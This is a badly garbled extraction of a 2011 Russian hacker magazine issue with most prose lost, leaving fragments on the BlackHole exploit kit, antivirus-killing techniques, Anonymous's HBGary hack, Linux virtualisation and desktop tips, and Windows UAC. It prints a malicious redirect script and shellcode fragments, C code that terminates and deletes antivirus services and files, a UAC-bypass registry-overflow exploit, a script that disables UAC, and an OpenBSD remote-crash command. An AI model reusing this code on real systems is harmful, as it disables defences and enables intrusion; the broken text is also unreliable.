antigate.com ( ).
:
;
;
;
.
:
,
.

.
Zdes Bil Ya
bit.ly/eJbNku. ,
.


,
,
.
, VkAksEnter
, , .
:
;
antigate.com;
/ (
);
/ ;
/ .
ioffe-soft.ru/?p=412. z

067

MALWARE

BlackHole exploit kit


PE, , -.
BlackHole exploit kit. ,
,
. ,
-.
, .
( )
( ).

. ,
, ,
. -

068

, . :
<html>
<head>
<script language='javascript'>
location.href =
'http://******.net/index.php?tp=98a8c9d4da3191f5';
X 06 /149/ 2011

. 1. html-, div

. 3.
-. 404 , PDF Java
</script>
<body>
</body>
</html>

HTML-, location.href=.

BlackHole, .
Hiew. ? ,
<html> <body>, asd:
.asd {width:0;height:0;overflow:hidden;}

div - (-,
) . ,
,
, .
JS, , ,
<div> (. 1).
.
FireBug FireFox,
MSDN, .
, .
eval , <div>. ,
, - ,
, (v*1,22222). ,
fromCharCode,
ANSI-. ,
. eval fromCharCode
. document , innerHTML #va
{background:url(data:,ring.from4harCo)}. va eval ring.from4CharCo
X 06 /149/ 2011

. 2. ,
html-
fromCharCode. eval?
, .
eval
. :
document.write(
'<center><h1>404 Not Found</h1></center><hr>');

,
404, , , .
, .
, html , ,

.
,
.
, :
CVE-2010-1885, CVE-2010-4452, CVE-2010-3552, ADODB.Stream
CVE-2010-0188. .

CVE-2010-1885

VBS-,
ADODB.Stream, 2004 (!) .
. ,
. . ,
, :).

MSXML2.XMLHTTP, ADODB.Stream Wscript. ,
, .

069

MALWARE

. 4. VBS-, ADODB.Stream

CVE-2010-4452

pushad
xor
mov
mov
mov
mov
mov
mov
cmp
jne
mov
popad
retn

, CVE2010-4452. Oracle
. Java .
code codebase <applet>
. ,
, ,
. :
IP- . , http://1476066051, .

ecx,ecx
esi,fs:[ecx][30]
esi,[esi][0C]
esi,[esi][1C]
ebx,[esi][08]
edx,[esi][20]
esi,[esi]
[edx][18],cx
[esp][1C],ebx

CVE-2010-3552
, ,
CVE-2010-3552. - Java Runtime Environment.
Java- launchjnlp, docbase
sprintf. , . -
kernel32 PEB:

API- (.
. 8.). urlmon.dll
URLDownloadToFile, .

Help and Support


Center

,
OC Windows Help and
Support Center. , -

. 5. , CVE-2010-1885

070

X 06 /149/ 2011

. 6. JavaScript', CVE2010-1088

. 7.
<pageSet>
<pageArea id="roteYom" name="roteYom">
<contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
<medium long="792pt" short="612pt" stock="default"/>
</pageArea>
</pageSet>
<subform h="756pt" w="576pt" name="qwgwqgwqg">
<field h="65mm" name="favwwbw" w="85mm" x="53.6501mm"
y="88.6499mm">
<event activity="initialize" name="loxRote">
<script contentType="application/x-javascript">

. 8. ,
API-
,
hcp://. , ,
html, . ,
, <div> .
. , , ,
CVE-2010-1885 (. . 5).
, , hcp://
%A.
, : SaveToFile, GET,
Adodb.Stream, WshShell.Run, MSXML2.XMLHTTP .

. ,
, .

Adobe Reader
Adobe Acrobat

,
PDF-, PE, . , :
- Adobe Reader Adobe Acrobat.
PDF. XFA
JavaScript. :
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
<subform layout="tb" locale="en_US" name="asfaewf">
X 06 /149/ 2011

, subform pageArea,
,
. initialize, 'event activity='.
.
, ,
. <div>
-.
Adobe,
. ,
favwwbw.rawValue ( favwwbw ) TIFF-.

, - .
(. . 7), . . UPX,
'upx d',
. , .

, ,
.
. ,
, :). z

071

MALWARE
RankoR (ax-soft.ru)

BEGINNERS EDITION

AVG, Trend
Micro Microsoft Security Essentials

- . ,
. ?
?

,
, . ,
:
Trend Micro - .
2007 .
AVG Internet Security 2011 ( )
, .

072

Microsoft Security Essentials .

. ,
. , () ,
X 06 /149/ 2011

AVG

.

Oracle VirtualBox Windows
XP SP3. ,
.
.
,
.
(VirtualBox Hostonly Ethernet adapter).
192.168.56.0/24.
192.168.56.102. C:\Share\
fuckAv.
IDE Visual Studio 2010, . ,
Debugging.
Debugger to launch Remote Windows Debugger;
Remote Command C:\Share\fuckAv\fuckAv.exe;
Working directory C:\Share\fuckAv;
Remote Server Name 192.168.56.102;
Connection Remote with no authentication (Native
only);
Debugger Type Native Only.

x86 ,
msvsmon.exe.

, , IDE .

( ) .
:
,
,
.
.

( ).

user-mode .
2 5
.
X 06 /149/ 2011

Epic Fail Microsoft

.
,
. ,
:
bool killProcessByPID(int PID)
{
return TerminateProcess(OpenProcess(
SYNCHRONIZE | PROCESS_TERMINATE, false, PID),
0);
}

,
SYNCHRONIZE PROCESS_TERMINATE, . ?
Microsoft
Security Essentials. , ,
, . ,
.
, :).
Trend Micro.
, , SYSTEM,
, usermode
. , ,
. , Trend Micro
.
AVG.
:
, . ,
Access Denied. .

DVD
dvd

Visual Studio
2010.

WARNING
warning
,
,

.

Service Permanently
Unavailable

, .
, ,
- . .
, .

073

MALWARE


bool stopService(const char *svcName)
{
SC_HANDLE scManager = NULL;
SC_HANDLE scService = NULL;
bool result = false;
SERVICE_STATUS ss;
scManager = OpenSCManager(NULL, NULL,
GENERIC_ALL);
if ( ! scManager )
{
printf("[-] Failed to open SCManager: %d\n",
GetLastError());

Trend Micro

return false;
}

, , Essentials. , ,
. ?
,
:

scService = OpenService(scManager, svcName,


GENERIC_ALL);
if ( ! scService )
{
printf("[-] Failed to open the service: %d\n",
GetLastError());

if ( result )
result = DeleteService(scService);

, ... ? MS SE, . ,
. , . .
.
Trend Micro . ,
, .. ,
, ERROR_INVALID_SERVICE_CONTROL. : DeleteService
true, . ,
.
AVG 2 avgwd
AVGIDSAgent. , . .

File not found

,
, . , ,
. :
bool removeFolder(const char *file)
{
return MoveFileEx(file, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
}

, MoveFileEx
, , ,
MOVEFILE_DELAY_UNTIL_REBOOT ,
.
,
() ,
. ,
. MS Security Essentials
, GUI. , Trend Micro, -

074

return false;
}
result = ControlService(scService,
SERVICE_CONTROL_STOP, &ss);

CloseServiceHandle(scService);
CloseServiceHandle(scManager);
return result;
}

.
exe,
4.
AVG
removeFolder("C:\\Program Files\\AVG\\AVG10\\avgui.
exe"); GUI ,
/dev/null.
..
, . .

, ,
.
, .
-
,
.
n- , , :). ,
: , ,
, ?
, ,
? z
X 06 /149/ 2011

MALWARE


.
?

BCG- (
, Boston Consulting
Group). :
,
. ,
,

, , . ?
CISCO
IT-, , , . .

Web-

()

VoIP

()

DDoS-

.
.
scareware
( ), ( ),
. ,
.
X 06 /149/ 2011

.
,

.
/
-,
,
, , .

.

.
. :
,
,

, DDoS-. ,
-
, .

.
,
,
(
),
( ).
CISCO
VoIP ,
, , . z

075


Mifrill (mifrill@real.xakep.ru)



. WIKILEAKS, THE PIRATE BAY, ,
, . ,
.
,

. .
. . .

Anonymous ( .,
), , ,

. , ,
-
Anonymous. ,
, -, . ,
, , ,
, ,

.
?
2003 ,
Anonymous
( !) ,
2ch 4chan,
Encyclopedia Dramatica,
( , ) .
.


. ,

,
,

076

, .


.
,
, , , , ... -,
, ,
:). , . , .


The Pirate Bay

,
Anonymous
. -
, , .

. ,
, , . ,
, , 75 000 000

.
,
, ,
.
( , )

.

,
.
.
, 2008 YouTube


(, , YouTube ),
-
.
, ,
,

.
, , ,
YouTube,
.


YouTube .
(Project Chanology),
DDoS- ,

,
YouTube.
.

X 06 /149/ 2011



,
-

. ,
. ,
C , .
: , .
,
. ,
,
. . . . . .
..
YouTube .
X 06 /149/ 2011

,
93- ,
, , , , , .

V / V . , , . V
, -,

I 1605 . ,
,

, .
.
( )
. , .
2009 ,
The Pirate
Bay. (,

077


), Bailout.
,

, .
17 ,
.
,
MAQS,
. 20 ,
,
DDoS-
ifpi.org, ifpi.com, ifpi.se maqs.com.
,
MPAA (
) MAQS,
,
. , ,
.

700 1000 .

IRC- (,
IRC, Twitter): irc.anonnet.org #tpb,
irc.raidchan.org #seedsofliberty, irc.anonnet.
org #888chan, irc.freenode.net #fuckifpi.
(
) LOIC
(Low Orbit Ion Cannon) , C# 4Chan.
, -
. TCP-,
UDP- HTTP- ,
. ,
,
. LOIC
,
.

( )
,

Twitter

078

Anonymous
HBGary

V V

,
.

Wikileaks HBGary

, ,

.
, , ,
. ,
Anonymous -
, .
YouTube,
Tumblr .

.

Wikileaks .
,
- :

,

(Moneybrookers, Visa, Masterard PayPal),
,
.
-,
,
.
,
.
2010 ,
: 8 10
LOIC 30 000 , ,


50 000. .
Payback
( .),
DDoS.
,
,
web-

,
. PayPal,
- . ,
:
,
, . DDoS .
. ,
IRC-.
DDoS:
MyFax.com
FaxZero.com.
Tor -.
Anonymous Wikileaks.
X 06 /149/ 2011

RSA 2011
( ),
, HBGary

, , ,
.


,
,
. ,
,
,
.

, , ,
.
, ,
, .
,
,
,
- .
, .
- DDoS,
-
:). ( )
,
.

HBGary Federal, .
- , .
HBGary
IT : , ,
, ,
,
. HBGary Federal
,
.
, -
.
,
- - DDoSX 06 /149/ 2011

,
.
Anonymous . .
, , , ,
LOIC
,
.
,
,
.

, .


, 20- .

DDoS-

.

?, . : . ,
,
.
,
, !
post factum ,
,
, , .
, .

, , .
(Goodspeak,
CogAnon) IRC-
,
.
,
,
, - .
, .
Facebook Twitter,
Google, . -
, ,
.
...

Financial Times,
, 45
Anonymous,
,
. , :
, , ,
. 30
10
.
-,
Q .
-
.

Financial Times,
anonnews.org
:
9000
- IRC-, ,

,
.
,

.
,
HBGary, , , .
,

079

: Keylogger 12
Monkeys. $60 000,
$240 000. ,
, HBGary
0day-, ,
. .

-
, .
. ,
.
DDoS .
Anonymous
,
.
DDoS-
hbgaryfederal.com. ,
,
.


,
. , , .
... hbgaryfederal.com SQL-.
CMS , . ,
: hbgaryfederal.com/pages.
php?pageNav=2&page=27.
,
, HBGary MD5 ,
, .

.
- ,
.
hbgaryfederal.com, Twitter, Facebook
LinkedIn , , hbgary.com rootkit.org, .
, ,
, 60
000 , , .
, iPad
:).

080

,
, ][
: www.xakep.ru/post/54902.
, , ,
.

.
,
.
:
. , ?
. ,
,
IRC. ,
, ?
!.
,
,
.
,
, , ,
. ,
,
.
, ,
. ,
TPB: thepiratebay.org/
torrent/6156166/HBGary_leaked_email.
, HBGary
. ,
,
(Palantir
Berico Technologies), Wikileaks.
,
WikiLeaks, , .
WikiLeaks . ,
, ,
.
, , , HBGary


HBGary
Federal,
.
, IT
,
. , .

,
.
HBGary, McAfee, ,
. - ,
: .
Anonymous, ,
.
: www.
facebook.com/anonleaks. ,
. -

Forbes, 16-
,
HBGary. ,
,
, ,
e-mail,
microSD-.
HBGary
, Sony,
,

.
PlayStation
Network ,
- , ...
, ,
,
PSN
.
70 000 000 !
, , ,

. ,
, , .
. z
X 06 /149/ 2011

UNIXOID
(execbit.ru)

CoLinux

Guest
Linux

Intermediate
0xFFFFFFFF

Host OS

0x80000000

... . , ,
, . - - .
.

IT.
,
. , , ,

082

, .
FreeBSD Solaris
:
FreeBSD Jail Solaris Zones.
, qemu
FreeBSD VirtualBox Solaris (
X 06 /149/ 2011

QEMU VM
Guest
vdagent

qxl driver

standart guest drivers

vmc
virtio-serial

QXL
(cirrus)

Keyboard
Mouse
Tablet

AC97
ES1370

inputs

record
playback

(nic)

spice server
main

display
cursor

(tunnel)

spice client

SPICE

user's machine


LXC

DVD

LXC

, .
/etc/fstab:

dvd

cgroup /var/cgroup cgroup defaults 0 0

CoLinux
/etc/network/interfaces (
Debian/Ubuntu- ):
auto br0
iface br0 inet dhcp
bridge_ports eth0
bridge_fd 0

qemu). Linux . qemu-kvm, KVM,


,
,
Linux-VServer OpenVZ. ,
:
, , Linux, ,
(
, ).
LXC,

. LXC (LinuX Containers)
Linux-VServer OpenVZ, X 06 /149/ 2011

(printer)

, ,
,
(namespaces)
(cgroups),
Linux-. Linux namespaces

-.
,
, ( chroot),
, IPC . , ,
,

.

cgroups,
( ,
, ).

, cgroups
(
, , ,


qemu
SPICE

Fedora 14 RHEL6,


Red Hat Enterprise
Virtualization for
Desktops.

HTTP://WWW
links

SPICE:
spice-space.org;
LXC: lxc.sf.net;
CoLinux: colinux.
org;
AndLinux: andlinux.
org.

083

UNIXOID

getty ( root:root).
-
,
/var/lib/lxc//rootfs, /var/lib/
lxc//config. , LXC , , (
cgroups ),
.

CoLinux Windows
libcgroups). , ,
LXC,
namespaces cgroups.
. LXC .
, Ubuntu,
(
LXC, ):
1. LXC :
$ sudo apt-get install lxc bridge-utils

2. , , LXC ( , LXC ,
):
$ sudo lxc-checkconfig

3. cgroups :
$ sudo mkdir /var/cgroup
$ sudo mount -t cgroup cgroup /var/cgroup

4. ,
(-
):
$ sudo brctl addbr br0

5. Ubuntu ( ) (LXC "",


/usr/lib/lxc/templates,
, ,
):
$ sudo apt-get install debootstrap
$ sudo lxc-create -n ubuntu -t ubuntu \
-f /usr/share/doc/lxc/examples/lxc-veth.conf

'-t' , '-f' .
6. :
$ sudo lxc-start -d -n ubuntu
$ sudo lxc-info -n ubuntu

sudo lxcconsole -n ubuntu.

084

,
, ,
.

, ,
.
, .
web-,
- : gmail, rss- google reader,
google docs web
2.0. , . , web-,
,
.
Photoshop, 3D Max
, , Crysis.
, Windows Linux,
,
.
: Remote Desktop
. , Photoshop 3D Max,
, ,
. ,
.
SPICE (Simple Protocol for Independent Computing
Environment
), Red Hat 2009 ,
.
SPICE ,
- ,
, .
SPICE , , .
,
( SPICE- ).
QXL,
.
,
QXL- ( VGA-), SPICE-,
. ,
, QXL
, , -,
, -,
. ,
QXL-
,
, X 06 /149/ 2011

LXC
SPICE ,
qemu,
, :
1. qemu '-spice':

lxc-checkconfig , LXC
(
QXL- );
,
(Quic, Lemel-Ziv, Global LZ),
; M-JPEG
.
SPICE , . ,
QXL . ,
.
QXL-,
.
.

.
SPICE ,
QXL.
,
- ,
.
SPICE
. , , ,
, ,
. , .
QXL, , .
: (,
QXL).
SPICE-
. , SPICE
,
.
. , , , (, ,
WiMAX-), SPICE QXL-
, ( ,
). .
X 06 /149/ 2011

$ qemu-kvm -spice port=1234,disable-ticketing \


-hda ///

2. SPICE- (
spice-client), :
$ spicec -h localhost -p 1234

,
'disable-ticketing' 'password='.

Linux

, , Windows Linux,
.
- , ,
. ,
, .

, .
,
. , ,
Windows , MS Office, . Wine,
-

Windows .
Wine , , ,
Windows. Cooperative Linux ( CoLinux)
. Wine
.
Wine, , Win32 Linux
, , CoLinux
Linux,
( , ,
).
CoLinux , Windows-. ,
Windows. ( , , ) CoLinux

085

UNIXOID

LXC-
( Windows).
Windows-
. CoLinux conet,
Windows ,
. cocon Linux,
Windows, Windows-,
CoLinux--.
CoLinux cobd,
,
Windows. X- Xming, Windows ( ,
X , , ,
, Windows,
CoLinux ).
PulseAudio, Windows
.
CoLinux .
Linux- Windows, , .
, Windows
Linux ,

. /
/ ? Windows
, .
, CoLinux ,
Linux. ,
(, Ubuntu CoLinux
9.04). AndLinux (andlinux.org)
Ubuntu 22 2009 , (KDE
XFCE-, CoLinux Ubuntu
40 ).
AndLinux ,
Windows- (goo.gl/jKhyZ) ,
, Windows.
AndLinux ,

086

. CoLinux: 0.7.4 0.8.0. ,


. ,
CoLinux: 128 , 192 1 .
, Windows,
.
Xming, PulseAudio .
AndLinux , :
NT-. , CoLinux
, . AndLinux
(, UNIX,
),
Windows CoLinux: ,
CoFS Samba (
) , ,
.
CoLinux (, Windows, , ).
AndLinux, ,
freedesktop.
XFCE-: , ,
Thunar Synaptic. KDE- AndLinux KDE 3.5.
- CoLinux
, .

.

,
. -

, .
,
. z
X 06 /149/ 2011

Adept (adeptg@gmail.com)

*nix

,
31 000 000 OpenSource-, 2 000 000 000 . ,
, .
.

,
: , . 30 ,
. , 4.1BSD
( , ),
BSD-.
Samba . ,
2008 , . Samba,
OpenBSD libc ( ,
lib/libc/gen/{readdir.c,telldir.c},
).
Samba - ,
- . , -

088

BSD-, Mac OS X.
, ,
-. 33 .

.
2008. malloc OpenBSD, . sparc64 ,
C++
Internal Compiler Error.
yacc(1): skeleton.c, yyparse(),
.
OpenBSD ,
. (
X 06 /149/ 2011

Load_Cycle


OpenSource-

Mozilla Russia.
, . -,
The Mozilla Security Bug Bounty Program
, ,
( ,
).
$3000 :).
Chrome/Chromium
Vulnerability Rewards Program.
$500 $1337.

), UNIX V6
( 1975) UNIX V7.

GRUB2,
1.97 ,
.
,
GRUB
. , xakep,
xake, xak, xa
x. ,
, .
1.97.1.
Ping of Death OpenBSD Packet
Filter (CVE-2009-0687), 9 2009
.
,
kernel panic . .
, OpenBSD

.
OpenBSD pf 4.5, ,
NetBSD 5.0 RC3. , , :
nmap -sO $target_IP

hping -0 -H 58 $target_IP

,
OpenBSD,
.
, 2005 - ral(4) IPsec
X 06 /149/ 2011

,
2 -. .
.: ,
Wi-Fi.
,
remote crash, pf.conf,
isakmpd.conf isakmpd.policy, traceback ,
ddb(4).
,
. , ,
Android- HTC G1. ,
.
, , SMS reboot, <Enter>, ,
. !
G1
Debian. , ! :)

,
. ,
,
. ( , ) Ubuntu
.
,
( ).
.
(
).
Ubuntu ,
.
.

. ,
, .
smartmontools:

INFO

info
Ubuntu Hundred
Paper Cuts ,

100

,
.

HTTP://WWW
links



BSD:
goo.gl/qH316;
Ping of Death
OpenBSD:
goo.gl/uHoCj;
Linux:
goo.gl/LJ2B1.

$ sudo apt-get install smartmontools

sda, :
$ sudo smartctl -a /dev/sda | grep Load_Cycle

. 13 137,
. ,
,
600 000. /-

089

UNIXOID

bug#1 bugs.launchpad.net
,
, .
, ,
8.04 ( ). ,
APM (Advanced Power
Management):
$ sudo hdparm -B 254 /dev/sda

( ,
APM
APM ),
goo.gl/bTNhy,
.
, . ,
OpenSource . ,
*nix-. Nvidia. 2010
196.75 195.36.
. , ,
,
.
, .

, .
,
, , *nix-.
, , , :
Firefox *nix (goo.gl/Hiagm).
2001 , , Firefox 3 beta 2.

Russian hot keys bugfix. ,

Mozilla Russia. . Mozilla Russia
, .
$300 $500,
, , : goo.gl/dhYxN.
OpenSource- .
,
X.Org, ,
. :
, .
: ,
<Alt+Shift>.

090

Nautilus Filename Repairer .


:)
(Alt+Shift+Tab) .
X.Org 2004 : goo.gl/GaRqQ. , ( ),
, XKB. ,
, :).
, , XKB2 (
).
, Ubuntu (
11.04). X.Org
ppa. : goo.gl/7E6uK.
FreeBSD
.
: USB-, , , Kernel Panic.
FreeBSD
, USB-.
, , RAR ZIP-,
Windows. RAR , ,
:
$ sudo apt-get remove rar
$ sudo apt-get install unrar

ZIP . launchpad goo.


gl/Y5YVj, (,
) 1000 ( launchpad
), .
HundredPaperCuts
, .
(, , ). ,
.
1. AltLinux, .
2. AltLinux .
, ,
. zip/unzip,
libnatspec. Ubuntu ppa: goo.
gl/AFSQq ( zip/unzip) goo.gl/eGGAe (
libnatspec).
3. - unzip: goo.gl/0Bd9Y. ,

.
4. convmv
X 06 /149/ 2011

zip-
,
elevator=deadline. grub
GRUB_CMDLINE_LINUX_DEFAULT
/etc/default/grub, :
$ sudo update-grub

2. swap:
# echo 10 > /proc/sys/vm/swappiness

OpenBSD remote crash vulnerability


( ):
$ convmv -f cp866 -t utf8 -r --notest *

5. Nautilus:
$ sudo apt-get install nautilus-filename-repairer

#12309. 12309 -,
. , Linux vs FreeBSD vs
Windows.
. Large
I/O operations result in poor interactive performance and high iowait
times, 550 : goo.gl/
uMKEn. 2008
P1 high. ,
, . :
$ dd if=/dev/zero of=/tmp/test bs=1M count=1M

, . wa ( LA),
, , ,
12309.
12309 , ,
. :
(
);
(, , );
USB-;
;
, :
1. - - -cfq. :
$ cat /sys/block/sdX/queue/scheduler

sdX ( sda).
.
:

swap ,
10%. Ubuntu, , swappiness 60.
, /etc/sysctl.conf.
3. . swap.
4. -
2.6.17 2.6.34.
, 12309, < 2.6.35.
USB-.


Ubuntu, bugs.launchpad.net, 20 2004 Microsoft has a majority market share.
. :
Microsoft . Ubuntu
, . IT-, IT
.
.
:
.
:
1. .
2.
Ubuntu / .
:
1. Ubuntu.
2. Ubuntu , .
3.
.
,
619 , 1500 . :).

, OpenSource .
.
OpenSource ,
. z

# echo deadline > /sys/block/sdX/queue/scheduler


X 06 /149/ 2011

091

UNIXOID
(execbit.ru)



.
,
.

. .
- ,
.
, fail safe,
Grub . , , ,
. KDE Gnome
,
.
: ( KDE
kdm, Gnome gdm) ,

092

(kdm gdm
, ).
.
ArchLinux Wiki (wiki.
archlinux.org). , .
/etc/inittab :
x:5:once:/bin/su _ -l -c "/bin/bash
--login -c startx >/dev/null 2>/dev/null"

,
X 06 /149/ 2011

easystroke
(
: id:5:initdefault:).
,
, ~/.xinitrc. ,
KDE,
exec startkde, Gnome exec gnome-session,
Fluxbox exec fluxbox .
, ,

.

WM

,
,
. EWMH (Extended Window
Manager Hints), , ,
-,
(, WM
Gnome - , Metacity,
Gnome
), -,
EWMH- WM , - .
, - ,
EWMH-
WM. wmctrl,
,
, , . , wmctrl
,
,
.
. ,
,
. , -
( ).
,
WM,
. , wmctrl
:
# vi ~/bin/wm-startup.sh
#!/bin/sh
#
X 06 /149/ 2011

Firefox Gnome Do
chromium &
audacious &
xterm -c mcabber &
# ,

sleep 5
# chromium

wmctrl -r chromium -t 2
wmctrl -r chromium -b add,fullscreen
# audacious,
wmctrl -r audacius -b add,shaded
# xterm mcabber
,
(50,50)
wmctrl -r mcabber -t 2
wmctrl -r mcabber -e 0,50,50,600,300
# chromium ,

wmctrl -a chromium

, mcabber
, , mcabber
, ,
, wmctrl.
, , -, wmctrl

, -, xterm ,

.
. , ,
. , ,
, IM-,
/ .
, , ,
, .
wmctrl:

INFO

info


xneur,
,
,

=

.
xneur


gxneur
(xneur.ru/downloads/).




xmodmap X.Org.


xbindkeys
(bit.ly/8aHUib).

093

UNIXOID

gxneur
800x600
$ wmctrl -r mcabber -b toggle,hidden

. , , , .
, , (, ,
, yakuake
tilde, ,
wmctrl ).

, , ,
:
(, ), ( , ).
.

UNIX-
. WM
, ,
,
, ( ).
, . , : WM
,
.
pytyle (pytyle.com), WM,
. WM
,
.
, .
:
$
$
$
$
$

sudo apt-get install python-xlib


wget http://goo.gl/V6rWY
tar -xzf pytyle-0.7.5.tar.gz
cd pytyle-0.7.5
sudo python setup.py install

:
$ pytyle

094

pytyle Ubuntu 10.10


,
pytyle WM,
.
<Alt+A>,
<Alt+U>.
<Alt+Z> ( ). - ,
,
. :
Alt+J / Alt+K ;
Alt+H / Alt+L ;
Alt+Shift+C ;
Alt+M ;
Alt+C ;
Alt+Shift+D / Alt+Shift+B
.

pytyle EWMH,
- WM (
EWMH- WM , , :
en.wikipedia.org/wiki/EWMH).

, Mac OS X - ?
, , , - , : , Launcher,
,
, <Alt+F2>.
,
:
, , , , , , . ,
.
( ) Mac OS X Launcher KDE4.
<Alt+F2>, ,
.
, . ,
Gnome XFCE - , , <Alt+F2>, .
. , Gnome Do (do.davebsd.
com) Launchy (launchy.net). .
, , mono
X 06 /149/ 2011

notify-send WM
Gnome Do QT Launchy (, , Linux
).

,

. , python, ruby , , ,
bash?
, bash .
,

.
zenity (live.gnome.org/Zenity). gdialog, , ,
dialog ( , ,
Slackware Linux).
,
, .
,
Hello World!:
$ zenity --info --text "Hello World\!"

('--entry'),
('--error'), ('--list'), - ('--progress'),
('--calendar') .
( ,
) ,
.
Zenity
, ,
notify-send.
. libnotify,
(
WM DE).
:
$ sudo apt-get install libnotify-bin
$ notify-send "Apache !"

:
$ notify-send -i gtk-dialog-info -u critical \
" 99%!"

Windows
Punto Switcher. ,
X 06 /149/ 2011

,
. Linux ( *nix) xneur (X Neural Switcher)
, Windows, ,
.
xneur ,
, , .
, xneur, .
xneur , Linux,
,
vim
xneur ( ,
).
xneur,
:
$ cp /usr/etc/xneur/xneurrc ~/.xneur/xneurrc

:
$ vi ~/.xneur/xneurrc
#
ManualMode Yes
# , xneur

SetAutoApp Pidgin
SetAutoApp Psi
SetAutoApp Gedit
SetAutoApp Chromium
# , xneur
ExcludeApp Focuswriter
ExcludeApp Wine

, ,
. ,
xneur ,
, , , .
.
xneur , :
xneur
Break ;
Shift+Break ;
Ctrl+Print ;
Alt+Scroll Lock
("" "privet");
Ctrl+Tab ;
Win+D

, xneur
, - , . , ,
, CapsLock,

095

UNIXOID

xneur

,
,
/ , .


,
. :
,
,
WM.
, xneur. xneurrc :


( ),
. :
, ,
, .
keytouchd,
,
( Debian/Ubuntu
).

,
.
,
, .
KDE, ,
.
: easystroke (sf.net/
apps/trac/easystroke):
$ sudo apt-get install easystroke

$ vi ~/.xneur/xneurrc
AddAction Alt t <cmd>gnome-terminal</cmd>
AddAction Alt g Gedit <cmd>gedit</cmd>
AddAction Super_L Nautilus <cmd>nautilus ~/</cmd>

,
, Google (Win+G) (Win+R).



,
.
.
.
KDE Gnome
, ,
- Fluxbox .
keytouch (keytouch.df.net),

096

,
.
. Add Action
, ( Command, ).

Stroke, .
() ( ,
).
, , (
, 10 10).
easystroke .


,
. , ,
. z
X 06 /149/ 2011

CODING
(stannic.man@gmail.com)

UAC

?

,
(UAC): ,
,
, .
, .
, UAC ?
Windows (, , ) ,
,
,
.
?,
: , ,
, ,
. , UAC , .

098

, ,
Windows.
,
,
. , ,
,
,
.
X 06 /149/ 2011

UAC
UAC
UAC ,
,
, . UAC

,
,
.
, UAC
, ,

Vista/7
UAC.
.

.

.
,
, .

API- ShellExecute
runas.
, ,
,

. : setup, install
update .

,
.
, ,

(appcompat).
, ,
RequireAdministrator RunAsInvoker.

X 06 /149/ 2011

requestedElevationLevel.
XML-, . Windows XP
DLL Microsoft .NET Framework.
trustInfo (
Firewallsettings.exe) , Windows Vista requestedElevationLevel. level
: asInvoker,
highestAvailable requireAdministrator.
<trustInfo
xmlns="urn:schema-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
Level="requireAdministrator"
uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>

,
, ( Notepad.exe),
asInvoker.
,
.
highestAvailable. , , ,
AAM
,
.
,
highestAvailable,
Regedit.exe, Mmc.exe Eventvwr.exe. ,
requireAdministrator
,

.

uiAccess true
. ,


, %SystemRoot% %ProgramFiles%.
, , , Sigcheck Sysinternals. :
sigcheck m <executable>. ,

DVD
dvd
DVD
,
,

UAC Windows 7.
,
(
?!),


.

HTTP://WWW
links



? Go for
zerodayinitiative.com
$1000
$10 000
!

INFO

info
:



!

099

CODING

'// ,
'// WshShell.Run "shutdown /r /f"

-, - , Windows Script
Host (WSH), , , , .
.
UAC , ,
.

UAC
, ( AIS, %SystemRoot%\System32\
Appinfo.dll), Service Host (%SystemRoot%\
System32\Svchost.exe), Consent.
exe (%SystemRoot%\System32\Consent.exe). Consent , , , ,
,
.
,
.

UAC

, , , , . UAC? , . , , .
(
Windows?), UAC , ,
. , .

UAC? !
++ C#
SendKeys, VBS-.
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)
WshShell.SendKeys("change uac")
WScript.Sleep(2000)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")
'//

100

, UAC?
, Windows UAC .
,
UAC .
WinAPI RtlQueryRegistryValues (msdn.microsoft.com),
, , RTL_QUERY_REGISTRY_TABLE,
__in__out .
( Microsoft)
API , ,
: HKCU\
EUDC\[Language]\SystemDefaultEUDCFont.
REG_BINARY, RtlQueryRegistryValues
.
API- Win32k.sys!NtGdiEnableEudc HKCU\EUDC\[Language]\SystemDefaultEUDCFont,
, REG_SZ,
UNICODE_STRING, ULONG (
).
REG_BINARY, ,
.

UINT codepage = GetACP();
TCHAR tmpstr[256];
_stprintf_s(tmpstr, TEXT("EUDC\\%d"), codepage);
HKEY hKey;
RegCreateKeyEx(HKEY_CURRENT_USER, tmpstr, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_SET_VALUE | DELETE, NULL,
&hKey, NULL);
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0,
REG_BINARY, RegBuf, ExpSize);
__try
{
EnableEUDC(TRUE);
}
__except(1)
{
}
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegCloseKey(hKey);

UAC . , , Windows
VIsta/W7 , .
. - ,
Windows.
,
IDA Pro WinDBG.
! z
X 06 /149/ 2011

>> coding

3 -
: 12 , 6
3 .

, ? ? .
- .

CODING
(seva@vingrad.ru)

SILVERLIGHT

Silverlight-
Silverlight, Flash,
web- . , , ,
, web-
. , Silverlight- web-.
HTML-
JavaScript.
DOM, JS
- , .
Rich Internet Application (RIA). Silverlight
.
ActiveX Microsoft
. , ,
,
RIA-.
Silverlight .NET, , Silverlight , , ,

ActiveX, , ,
.

Silverlight

Silverlight ,
web-
.
, -trusted ( ) Silverlight- ,
.
Silverlight ,

102

:
in browser mode Silverlight-
web- (sandbox),
, , JavaScript.
, SL-
object, .
out of browser mode ,
.
,
, inbrowser, SL-
.
out of browser trusted mode
Silverlight- ,
,
.
in browser,
Silverlight-,
web-.
Silverlight- ,
.

Sandbox

sandboxed- :
user initiated X 06 /149/ 2011


Silverlight
Rich Internet Application

Desktop
Applications

Web
Applications
RIA

Communication
Technologies

(, web-,
Silverlight) . KeyDown/KeyUp/MouseDown/
MouseUp.
, ,
. , , , - ,
, , .
same origin police
, , .
, , .

Silverlight:
1. OpenFileDialog/SaveFileDialog Silverlight
, ,
, .
X 06 /149/ 2011

. , Silverlight,
.
2. Webcam/Microphone SL- 4.0
web-,
, ,
. ,
SL- . : ,
web-.
